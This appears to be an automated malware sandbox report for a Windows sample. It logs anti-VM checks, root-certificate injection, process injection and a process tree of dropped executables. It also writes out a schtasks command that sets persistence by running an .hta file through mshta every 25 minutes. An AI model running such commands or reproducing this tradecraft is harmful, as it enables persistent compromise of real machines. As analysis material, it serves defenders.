description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dc4be0dfa1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 dc4be0dfa1.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1804 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 2092 taskkill.exe 2096 taskkill.exe 1508 taskkill.exe 1456 taskkill.exe 1476 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 b34dd26e42.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a b34dd26e42.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a b34dd26e42.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 8f62e4017e.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 8f62e4017e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1200 schtasks.exe 1492 schtasks.exe 836 schtasks.exe 4072 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1668 2341120afd619b888c8316c0a91d39b8.exe 2748 skotes.exe 3008 powershell.exe 3008 powershell.exe 3008 powershell.exe 2780 powershell.exe 1592 TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE 1936 powershell.exe 1240 powershell.exe 2692 powershell.exe 1592 TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE 1592 TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE 2124 b3513fa42a.exe 2124 b3513fa42a.exe 2124 b3513fa42a.exe 2124 b3513fa42a.exe 2124 b3513fa42a.exe 2692 powershell.exe 2692 powershell.exe 2180 483d2fa8a0d53818306efeb32d3.exe 668 dc4be0dfa1.exe 668 dc4be0dfa1.exe 668 dc4be0dfa1.exe 668 dc4be0dfa1.exe 668 dc4be0dfa1.exe 668 dc4be0dfa1.exe 3044 b34dd26e42.exe 1240 d71a31942b.exe 1696 jROrnzx.exe 1696 jROrnzx.exe 1696 jROrnzx.exe 1696 jROrnzx.exe 904 monthdragon.exe 904 monthdragon.exe 904 monthdragon.exe 904 monthdragon.exe 1796 chrome.exe 1796 chrome.exe 2280 9b9b61ca89.exe 2752 67839429c6.exe 2752 67839429c6.exe 2752 67839429c6.exe 2752 67839429c6.exe 2752 67839429c6.exe 2620 0b87b998dd.exe 316 73a2489454.exe 1360 1a76572772.exe 1920 7e0a6a635d.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 3484 TempAKP2DYV3BSK07NDW6T3KZEUUEAXHHF21.EXE 3484 TempAKP2DYV3BSK07NDW6T3KZEUUEAXHHF21.EXE 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 3532 Bjkm5hE.exe 3532 Bjkm5hE.exe 3532 Bjkm5hE.exe 3532 Bjkm5hE.exe 3936 d2YQIJa.exe 3936 d2YQIJa.exe 3936 d2YQIJa.exe -
Suspicious use of AdjustPrivilegeToken 32 IoCs
description pid Process Token: SeDebugPrivilege 3008 powershell.exe Token: SeDebugPrivilege 2780 powershell.exe Token: SeDebugPrivilege 1936 powershell.exe Token: SeDebugPrivilege 1240 powershell.exe Token: SeDebugPrivilege 2692 powershell.exe Token: SeDebugPrivilege 1592 TempXXVPWKKJMPRBLLOARWCSG77GANNFWZDH.EXE Token: SeShutdownPrivilege 1796 chrome.exe Token: SeShutdownPrivilege 1796 chrome.exe Token: SeShutdownPrivilege 1796 chrome.exe Token: SeShutdownPrivilege 1796 chrome.exe Token: SeDebugPrivilege 2092 taskkill.exe Token: SeDebugPrivilege 2096 taskkill.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeDebugPrivilege 1508 taskkill.exe Token: SeDebugPrivilege 1456 taskkill.exe Token: SeDebugPrivilege 1476 taskkill.exe Token: SeDebugPrivilege 2924 firefox.exe Token: SeDebugPrivilege 2924 firefox.exe Token: SeDebugPrivilege 1884 powershell.exe Token: SeShutdownPrivilege 3728 chrome.exe Token: SeShutdownPrivilege 3728 chrome.exe Token: SeDebugPrivilege 3368 6405293e8c.exe Token: SeShutdownPrivilege 3728 chrome.exe Token: SeShutdownPrivilege 3728 chrome.exe Token: SeShutdownPrivilege 3728 chrome.exe Token: SeShutdownPrivilege 3728 chrome.exe Token: SeShutdownPrivilege 3728 chrome.exe Token: SeShutdownPrivilege 3728 chrome.exe Token: SeShutdownPrivilege 3728 chrome.exe Token: SeShutdownPrivilege 3728 chrome.exe Token: SeShutdownPrivilege 3728 chrome.exe Token: SeShutdownPrivilege 3728 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1668 2341120afd619b888c8316c0a91d39b8.exe 1620 97b95b1f04.exe 1620 97b95b1f04.exe 1620 97b95b1f04.exe 2260 amnew.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1796 chrome.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 2344 284e4384ff.exe 2344 284e4384ff.exe 2344 284e4384ff.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 2924 firefox.exe 2924 firefox.exe 2924 firefox.exe 2924 firefox.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 3728 chrome.exe 3728 chrome.exe 3728 chrome.exe 3728 chrome.exe 3728 chrome.exe 3728 chrome.exe -
Suspicious use of SendNotifyMessage 21 IoCs
pid Process 1620 97b95b1f04.exe 1620 97b95b1f04.exe 1620 97b95b1f04.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 2344 284e4384ff.exe 2344 284e4384ff.exe 2344 284e4384ff.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 2924 firefox.exe 2924 firefox.exe 2924 firefox.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe 1920 7e0a6a635d.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1668 wrote to memory of 2748 1668 2341120afd619b888c8316c0a91d39b8.exe 31 PID 1668 wrote to memory of 2748 1668 2341120afd619b888c8316c0a91d39b8.exe 31 PID 1668 wrote to memory of 2748 1668 2341120afd619b888c8316c0a91d39b8.exe 31 PID 1668 wrote to memory of 2748 1668 2341120afd619b888c8316c0a91d39b8.exe 31 PID 2748 wrote to memory of 1620 2748 skotes.exe 33 PID 2748 wrote to memory of 1620 2748 skotes.exe 33 PID 2748 wrote to memory of 1620 2748 skotes.exe 33 PID 2748 wrote to memory of 1620 2748 skotes.exe 33 PID 1620 wrote to memory of 2032 1620 97b95b1f04.exe 34 PID 1620 wrote to memory of 2032 1620 97b95b1f04.exe 34 PID 1620 wrote to memory of 2032 1620 97b95b1f04.exe 34 PID 1620 wrote to memory of 2032 1620 97b95b1f04.exe 34 PID 1620 wrote to memory of 2020 1620 97b95b1f04.exe 35 PID 1620 wrote to memory of 2020 1620 97b95b1f04.exe 35 PID 1620 wrote to memory of 2020 1620 97b95b1f04.exe 35 PID 1620 wrote to memory of 2020 1620 97b95b1f04.exe 35 PID 2032 wrote to memory of 1200 2032 cmd.exe 37 PID 2032 wrote to memory of 1200 2032 cmd.exe 37 PID 2032 wrote to memory of 1200 2032 cmd.exe 37 PID 2032 wrote to memory of 1200 2032 cmd.exe 37 PID 2020 wrote to memory of 3008 2020 mshta.exe 38 PID 2020 wrote to memory of 3008 2020 mshta.exe 38 PID 2020 wrote to memory of 3008 2020 mshta.exe 38 PID 2020 wrote to memory of 3008 2020 mshta.exe 38 PID 2748 wrote to memory of 1664 2748 skotes.exe 40 PID 2748 wrote to memory of 1664 2748 skotes.exe 40 PID 2748 wrote to memory of 1664 2748 skotes.exe 40 PID 2748 wrote to memory of 1664 2748 skotes.exe 40 PID 1664 wrote to memory of 1596 1664 cmd.exe 42 PID 1664 wrote to memory of 1596 1664 cmd.exe 42 PID 1664 wrote to memory of 1596 1664 cmd.exe 42 PID 1664 wrote to memory of 1596 1664 cmd.exe 42 PID 1596 wrote to memory of 1804 1596 cmd.exe 44 PID 1596 wrote to memory of 1804 1596 cmd.exe 44 PID 1596 wrote to memory of 1804 1596 cmd.exe 44 PID 1596 wrote to memory of 1804 1596 cmd.exe 44 PID 3008 wrote to memory of 1592 3008 powershell.exe 45 PID 3008 wrote to memory of 1592 3008 powershell.exe 45 PID 3008 wrote to memory of 1592 3008 powershell.exe 45 PID 3008 wrote to memory of 1592 3008 powershell.exe 45 PID 1596 wrote to memory of 864 1596 cmd.exe 46 PID 1596 wrote to memory of 864 1596 cmd.exe 46 PID 1596 wrote to memory of 864 1596 cmd.exe 46 PID 1596 wrote to memory of 864 1596 cmd.exe 46 PID 864 wrote to memory of 2780 864 cmd.exe 47 PID 864 wrote to memory of 2780 864 cmd.exe 47 PID 864 wrote to memory of 2780 864 cmd.exe 47 PID 864 wrote to memory of 2780 864 cmd.exe 47 PID 1596 wrote to memory of 3048 1596 cmd.exe 48 PID 1596 wrote to memory of 3048 1596 cmd.exe 48 PID 1596 wrote to memory of 3048 1596 cmd.exe 48 PID 1596 wrote to memory of 3048 1596 cmd.exe 48 PID 3048 wrote to memory of 1936 3048 cmd.exe 49 PID 3048 wrote to memory of 1936 3048 cmd.exe 49 PID 3048 wrote to memory of 1936 3048 cmd.exe 49 PID 3048 wrote to memory of 1936 3048 cmd.exe 49 PID 1596 wrote to memory of 1680 1596 cmd.exe 50 PID 1596 wrote to memory of 1680 1596 cmd.exe 50 PID 1596 wrote to memory of 1680 1596 cmd.exe 50 PID 1596 wrote to memory of 1680 1596 cmd.exe 50 PID 1680 wrote to memory of 1240 1680 cmd.exe 51 PID 1680 wrote to memory of 1240 1680 cmd.exe 51 PID 1680 wrote to memory of 1240 1680 cmd.exe 51 PID 1680 wrote to memory of 1240 1680 cmd.exe 51 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2341120afd619b888c8316c0a91d39b8.exe"C:\Users\Admin\AppData\Local\Temp\2341120afd619b888c8316c0a91d39b8.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Users\Admin\AppData\Local\Temp\1085378101\97b95b1f04.exe"C:\Users\Admin\AppData\Local\Temp\1085378101\97b95b1f04.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn rIrBgmalQ01 /tr "mshta C:\Users\Admin\AppData\Local\Temp\L1gHGJV4N.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
